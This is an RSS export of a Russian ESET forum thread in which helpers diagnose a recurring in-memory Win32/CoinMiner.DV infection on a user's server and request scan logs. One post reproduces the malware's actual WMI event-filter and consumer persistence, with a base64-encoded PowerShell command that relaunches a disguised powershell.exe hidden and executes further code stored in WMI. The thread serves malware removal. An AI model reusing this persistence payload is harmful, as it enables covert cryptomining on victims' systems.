Форум esetnod32.ru [тема: Win32/CoinMiner.DV]

Форум esetnod32.ru [тема: Win32/CoinMiner.DV] http://forum.esetnod32.ru Новое в теме Win32/CoinMiner.DV форума на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Tue, 28 Apr 2026 21:34:21 +0300 Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
похоже, здесь используется запуск через WMI закодированного скрипта, возможно именно этот скрипт содержит запуск майнера, связанного с процессом msiexec

====quote====
Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла POWERSHELL.EXE
Тек. статус ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]

Сохраненная информация на момент создания образа
Статус ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
File_Id 4A5BC7F377000
Linker 9.0
Размер 473600 байт
Создан 14.07.2009 в 03:49:07
Изменен 14.07.2009 в 05:39:20

TimeStamp 13.07.2009 в 23:49:07
EntryPoint +
OS Version 0.1
Subsystem Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла 64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись Действительна, подписано Microsoft Windows

Оригинальное имя PowerShell.EXE.MUI
Версия файла 6.1.7600.16385 (win7_rtm.090713-1255)
Описание Windows PowerShell
Производитель Microsoft Corporation

Доп. информация на момент обновления списка
SHA1 5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC
MD5 852D67A27E454BD389FA7F02A8CBE23F

Namespace \\.\root\subscription
Consumer_Name FsxxleConsumer
Consumer_Class CommandLineEventConsumer
Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAtAGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBjACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBpAG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEAIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4AZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUAeABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4AZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=
Filter_Name FsxxleFilter
Filter_Class __EventFilter
Filter_Query SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "CommandLineEventConsumer.Name="FsxxleConsumer"";
Filter = "__EventFilter.Name="FsxxleFilter"";
};

#MOF_Event#
instance of __EventFilter
{
EventNamespace = "root\\cimv2";
Name = "FsxxleFilter";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
QueryLanguage = "WQL";
};

#MOF_Consumer#
instance of CommandLineEventConsumer
{
CommandLineTemplate = "powershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAtAGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBjACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBpAG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEAIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4AZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUAeABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4AZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=";
Name = "FsxxleConsumer";
};
=============

28.09.2018 09:29:04, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104536/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104536/ Fri, 28 Sep 2018 09:29:04 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
+ еще вариант, сделать образ автозапуска из безопасного режима системы
24.08.2018 12:48:58, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104192/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104192/ Fri, 24 Aug 2018 12:48:58 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
Роман Т написал:
Такое чувство, что он компилируется в памяти, почему он не находится антивирусом на диске?
=============
возможно, майнер загружается в память извне в результате эксплуатации какой-либо уязвимости системных служб или установленных приложений.

ваш сервер виден из внешней сети напрямую, или доступен только после подключения по VPN?
24.08.2018 10:07:56, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104191/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104191/ Fri, 24 Aug 2018 10:07:56 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
24.08.2018 9:04:28;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = msiexec.exe(4492);модифицированный Win32/CoinMiner.DV потенциально нежелательная программа;очищен удалением
Такое чувство, что он компилируется в памяти, почему он не находится антивирусом на диске?
24.08.2018 09:13:23, Роман Т.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104188/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104188/ Fri, 24 Aug 2018 09:13:23 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
24.08.2018 9:04:28;Оперативная память = msiexec.exe(4492);модифицированный Win32/CoinMiner.DV потенциально нежелательная программа;очищен удалением
24.08.2018 09:06:30, Роман Т.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104186/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104186/ Fri, 24 Aug 2018 09:06:30 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
Что сейчас с проблемой обнаружения майнера в оперативной памяти?
24.08.2018 07:46:36, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104182/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104182/ Fri, 24 Aug 2018 07:46:36 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
Выкладываю
AdwCleaner[C00].txt
FRST.txt
Addition.txt
24.08.2018 07:24:45, Роман Т.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104180/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104180/ Fri, 24 Aug 2018 07:24:45 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
1) Выполните лог в AdwCleaner
http://forum.esetnod32.ru/forum9/topic7084/

после завершения сканирования:
Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой )
На вкладке:
Папки (Folders) для Mail.Ru и Yandex снимите [V]

Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие
с автоперезагрузкой

2) Выполните FRST: http://forum.esetnod32.ru/forum9/topic2798/
23.08.2018 19:30:55, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104176/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104176/ Thu, 23 Aug 2018 19:30:55 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
Выкладываю
malware.txt
23.08.2018 19:01:24, Роман Т.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104175/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104175/ Thu, 23 Aug 2018 19:01:24 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
добавьте лог проверки в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/
23.08.2018 14:57:42, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104172/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104172/ Thu, 23 Aug 2018 14:57:42 +0300 Обнаружение вредоносного кода и ложные срабатывания Win32/CoinMiner.DV Win32/CoinMiner.DV WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script в форуме Обнаружение вредоносного кода и ложные срабатывания.
Словил майнер на Сервере и не могу избавится: Оперативная память = msiexec.exe(16684);модифицированный Win32/CoinMiner.DV

TS-SERV_2018-08-23_12-05-46
Журнал Антивируса
23.08.2018 14:39:36, Роман Тимашков.]]> http://forum.esetnod32.ru/messages/forum6/topic14912/message104171/ http://forum.esetnod32.ru/messages/forum6/topic14912/message104171/ Thu, 23 Aug 2018 14:39:36 +0300 Обнаружение вредоносного кода и ложные срабатывания